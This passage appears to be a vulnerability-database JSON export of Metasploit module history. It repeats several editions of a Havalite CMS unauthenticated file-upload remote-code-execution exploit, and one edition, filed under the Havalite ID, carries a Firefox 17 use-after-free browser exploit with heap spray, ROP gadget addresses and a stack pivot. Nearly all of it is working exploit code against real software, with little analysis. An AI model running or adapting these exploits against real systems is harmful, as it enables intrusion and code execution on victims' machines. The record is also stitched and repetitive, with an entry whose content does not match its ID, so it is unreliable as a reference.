'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-29T17:50:07", "differentElements": ["modified", "published"], "edition": 104}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-30T00:33:50", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2019-09-30T00:33:50"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4538-1:D6CC7", "DEBIAN:DLA-1937-1:B255A", "DEBIAN:DSA-4537-1:645C5", "DEBIAN:DLA-1934-1:D1937", "DEBIAN:DLA-1935-1:31587", "DEBIAN:DLA-1936-1:CB642", "DEBIAN:DSA-4536-1:AA824", "DEBIAN:DSA-4535-1:DB4A4"]}, {"type": "kitploit", "idList": ["KITPLOIT:6630845352841826230", "KITPLOIT:730987502722793008"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2212-1", "OPENSUSE-SU-2019:2213-1", "OPENSUSE-SU-2019:2207-1", "OPENSUSE-SU-2019:2208-1", "OPENSUSE-SU-2019:2205-1", "OPENSUSE-SU-2019:2204-1", "OPENSUSE-SU-2019:2211-1", "OPENSUSE-SU-2019:2206-1"]}, {"type": "freebsd", "idList": ["E917CABA-E291-11E9-89F1-152FED202BB7"]}, {"type": "ubuntu", "idList": ["USN-4141-1"]}], "modified": "2019-09-30T00:33:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-30T00:33:50", "differentElements": ["modified", "published"], "edition": 105}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T09:40:31", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2019-10-08T09:40:31"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2292-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2288-1", "OPENSUSE-SU-2019:2280-1", "OPENSUSE-SU-2019:2281-1", "OPENSUSE-SU-2019:2279-1", "OPENSUSE-SU-2019:2278-1", "OPENSUSE-SU-2019:2282-1", "OPENSUSE-SU-2019:2283-1", "OPENSUSE-SU-2019:2276-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2974", "RHSA-2019:2973"]}, {"type": "kitploit", "idList": ["KITPLOIT:4019975092566820832"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4539-2:0772C", "DEBIAN:DLA-1948-1:E0D76", "DEBIAN:DLA-1942-2:93F4A"]}, {"type": "ubuntu", "idList": ["USN-4148-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891947"]}], "modified": "2019-10-08T09:40:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T09:40:31", "differentElements": ["modified", "published"], "edition": 106}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T12:23:38", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-10-08T12:23:38"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2980", "RHSA-2019:2978", "RHSA-2019:2977", "RHSA-2019:2974", "RHSA-2019:2973"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2292-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2288-1", "OPENSUSE-SU-2019:2280-1", "OPENSUSE-SU-2019:2281-1", "OPENSUSE-SU-2019:2279-1", "OPENSUSE-SU-2019:2278-1", "OPENSUSE-SU-2019:2282-1", "OPENSUSE-SU-2019:2283-1", "OPENSUSE-SU-2019:2276-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:4019975092566820832"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4539-2:0772C", "DEBIAN:DLA-1948-1:E0D76", "DEBIAN:DLA-1942-2:93F4A"]}], "modified": "2019-10-08T12:23:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T12:23:38", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 107}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ac07f3d729228116f15db7ea8451686e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via a specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.\n", "published": "2013-08-07T20:36:54", "modified": "2017-09-09T02:19:55", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690", "https://www.mozilla.org/security/announce/2013/mfsa2013-53.html", "https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=901365", "http://krash.in/ffn0day.txt", "http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae"], "cvelist": ["CVE-2013-1690"], "lastseen": "2019-10-08T13:41:47", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2019-10-08T13:41:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1690"]}, {"type": "saint", "idList": ["SAINT:777991960CE017DA619939903D62924F", "SAINT:3A0ADAAFFAFD468DC437DB98F455F7D0", "SAINT:14E92DF0A7C5748213D702F14670E0F6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MOZILLA_FIREFOX_ONREADYSTATECHANGE"]}, {"type": "mozilla", "idList": ["MFSA2013-53"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122750"]}, {"type": "seebug", "idList": ["SSV:60948"]}, {"type": "exploitdb", "idList": ["EDB-ID:27429"]}, {"type": "zdt", "idList": ["1337DAY-ID-21082"]}, {"type": "threatpost", "idList": ["THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1153-1", "OPENSUSE-SU-2013:1143-1", "OPENSUSE-SU-2013:1141-1", "OPENSUSE-SU-2013:1140-1", "OPENSUSE-SU-2013:1142-1"]}, {"type": "nessus", "idList": ["SUSE_FIREFOX-20130628-8636.NASL", "SUSE_11_FIREFOX-20130628-130628.NASL", "SL_20130625_THUNDERBIRD_ON_SL5_X.NASL", "REDHAT-RHSA-2013-0982.NASL", "OPENSUSE-2013-555.NASL", "CENTOS_RHSA-2013-0982.NASL", "SL_20130625_FIREFOX_ON_SL5_X.NASL", "OPENSUSE-2013-554.NASL", "ORACLELINUX_ELSA-2013-0981.NASL", "REDHAT-RHSA-2013-0981.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:903221", "OPENVAS:903215", "OPENVAS:1361412562310881753", "OPENVAS:881753", "OPENVAS:1361412562310881755", "OPENVAS:1361412562310903215", "OPENVAS:1361412562310903217", "OPENVAS:1361412562310850496", "OPENVAS:871012", "OPENVAS:1361412562310123605"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2716-1:03728", "DEBIAN:DSA-2720-1:1CEA2"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0981", "ELSA-2013-0982"]}, {"type": "redhat", "idList": ["RHSA-2013:0981", "RHSA-2013:0982"]}, {"type": "ubuntu", "idList": ["USN-1891-1", "USN-1890-1"]}, {"type": "centos", "idList": ["CESA-2013:0982", "CESA-2013:0981"]}, {"type": "freebsd", "idList": ["B3FCB387-DE4B-11E2-B1C6-0025905A4771"]}], "modified": "2019-10-08T13:41:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',\n 'Description' => %q{\n This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nils', # vulnerability discovery\n 'Unknown', # 1day exploit, prolly the FBI\n 'w3bd3vil', # 1day analysis\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1690' ],\n [ 'OSVDB', '94584'],\n [ 'BID', '60778'],\n [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],\n [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],\n [ 'URL', 'http://krash.in/ffn0day.txt' ],\n [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Firefox 17 & Firefox 21 / Windows XP SP3',\n {\n 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory\n 'RetGadget' => 0x77c3ee16, # ret from msvcrt\n 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP\n 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory\n }\n ]\n ],\n 'DisclosureDate' => 'Jun 25 2013',\n 'DefaultTarget' => 0))\n\n end\n\n def stack_pivot\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n return pivot\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n vprint_status(\"Agent: #{agent}\")\n\n if agent !~ /Windows NT 5\\.1/\n print_error(\"Windows XP not found, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n unless agent =~ /Firefox\\/(17|21)/\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\n\n # build html\n code = [\n target['VFuncPtr'],\n target['RetGadget'],\n target['StackPivot'],\n junk\n ].pack(\"V*\")\n code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\n js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))\n\n content = <<-HTML\n<html>\n<body>\n<iframe src=\"#{my_uri}/iframe.html\"></iframe>\n</body></html>\n HTML\n\n # build iframe\n iframe = <<-IFRAME\n<script>\nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\";\nvar test = new Array();\nvar heap_chunks;\nfunction heapSpray(shellcode, fillsled) {\n var chunk_size, headersize, fillsled_len, code;\n var i, codewithnum;\n chunk_size = 0x40000;\n headersize = 0x10;\n fillsled_len = chunk_size - (headersize + shellcode.length);\n while (fillsled.length <fillsled_len)\n fillsled += fillsled;\n fillsled = fillsled.substring(0, fillsled_len);\n code = shellcode + fillsled;\n heap_chunks = new Array();\n for (i = 0; i<1000; i++)\n {\n codewithnum = \"HERE\" + code;\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\n }\n}\n\n\nfunction b() {\n for(var c=0;1024>c;c++) {\n test[c]=new ArrayBuffer(180);\n bufView = new Uint32Array(test[c]);\n for (var i=0; i < 45; i++) {\n bufView[i] = #{target['FakeObject']};\n }\n }\n}\n\nfunction a() {\n window.stop();\n var myshellcode = unescape(\"#{js_code}\");\n var myfillsled = unescape(\"#{js_random}\");\n heapSpray(myshellcode,myfillsled);\n b();\n window.parent.frames[0].frameElement.ownerDocument.write(z);\n}\n\ndocument.addEventListener(\"readystatechange\",a,null);\n</script>\n IFRAME\n\n print_status(\"URI #{request.uri} requested...\")\n\n if request.uri =~ /iframe\\.html/\n print_status(\"Sending iframe HTML\")\n send_response(cli, iframe, {'Content-Type'=>'text/html'})\n return\n end\n\n print_status(\"Sending HTML\")\n send_response(cli, content, {'Content-Type'=>'text/html'})\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T13:41:47", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 108}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T19:08:35", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2019-10-08T19:08:35"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2294-1", "OPENSUSE-SU-2019:2292-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2288-1", "OPENSUSE-SU-2019:2280-1", "OPENSUSE-SU-2019:2281-1", "OPENSUSE-SU-2019:2279-1", "OPENSUSE-SU-2019:2278-1"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1950-1:F990F", "DEBIAN:DLA-1949-1:95A46"]}, {"type": "redhat", "idList": ["RHSA-2019:2980", "RHSA-2019:2979", "RHSA-2019:2978", "RHSA-2019:2977", "RHSA-2019:2975", "RHSA-2019:2974", "RHSA-2019:2973"]}, {"type": "symantec", "idList": ["SMNTC-110339"]}, {"type": "ubuntu", "idList": ["USN-4149-1"]}], "modified": "2019-10-08T19:08:35"}}, "objectVersion": "1.4", "sourceHref": 